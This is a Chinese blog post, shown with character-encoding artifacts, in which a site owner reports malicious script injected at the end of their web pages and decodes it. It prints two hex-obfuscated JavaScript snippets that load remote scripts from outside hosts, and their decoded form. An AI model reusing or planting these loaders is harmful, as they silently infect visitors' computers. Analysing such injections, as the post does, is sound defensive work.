今天打開(kāi)一個(gè)自己的網(wǎng)頁(yè),竟發(fā)現(xiàn)了文件尾巴病毒源,真是可惡,空間商沒(méi)做好殺毒防毒啊。
病毒源如下:
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
這是一段通過(guò)16進(jìn)制編碼的script病毒,當(dāng)你打開(kāi)含有這段代碼的頁(yè)面時(shí),那你的電腦立馬中毒,好狠啊!
可以通過(guò)alert來(lái)解密,例如把上面粗體字代碼解密:
<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>
解密結(jié)果是:
同樣的,把后面各個(gè)中括號(hào)里的代碼段alert,結(jié)果這個(gè)病毒源代碼就出來(lái)了。上面的病毒源代碼解密結(jié)果是:
document.write("<script language=javascript src=http://gg999.5166.info/gg/gg.js></script>");
很明顯,這是在你電腦執(zhí)行一段javascript掛馬程序,一旦你打開(kāi)含有這段代碼的頁(yè)面,你的電腦就立即中招了。
這些病毒我暫時(shí)沒(méi)找到專殺軟件,例如你有上千個(gè)頁(yè)面都中毒了,那是不能手動(dòng)一個(gè)一個(gè)清除的了。一旦我找到專殺軟件,會(huì)第一時(shí)間來(lái)博客共享。有網(wǎng)友發(fā)現(xiàn)專殺軟件了嗎?